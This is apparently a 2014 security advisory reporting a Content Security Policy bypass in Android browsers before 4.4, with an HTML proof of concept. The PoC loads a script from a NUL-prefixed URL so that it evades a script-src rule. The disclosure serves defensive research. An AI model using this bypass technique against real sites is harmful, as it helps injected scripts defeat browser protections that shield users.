Android prior to 4.4 CSP Bypass

2014.10.13
Credit: Evan J
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

I've found a Content Security Policy bypass similar and related to the same origin policy bypass in CVE-2014-6041 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041). I've tested this on an Android 4.3 tablet running a bunch of different browsers, including Inbrowser, Firefox, and the default Android browser on an emulator for Android 4.3.1.

HTML PoC:

<input type=button value="test" onclick="
  a=document.createElement('script');
  a.id='AA';
  /* the leading NUL byte in the URL is what slips past the v3-only policy */
  a.src='\u0000https://js.stripe.com/v2/';
  document.body.appendChild(a);
  setTimeout(function(){
    if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{alert(2);}
  }, 400);
  return false;">

The content security policy rule that should block this is:

script-src 'self' https://js.stripe.com/v3/ ;

The PoC worked if you see a popup containing Stripe's e(){} object. I set the timeout kind of short, so you may have to press the button twice before you see the popup. I have a PoC test page at ejj.io/test.php

Cheers,
Evan J

References:

http://seclists.org/fulldisclosure/2014/Oct/51
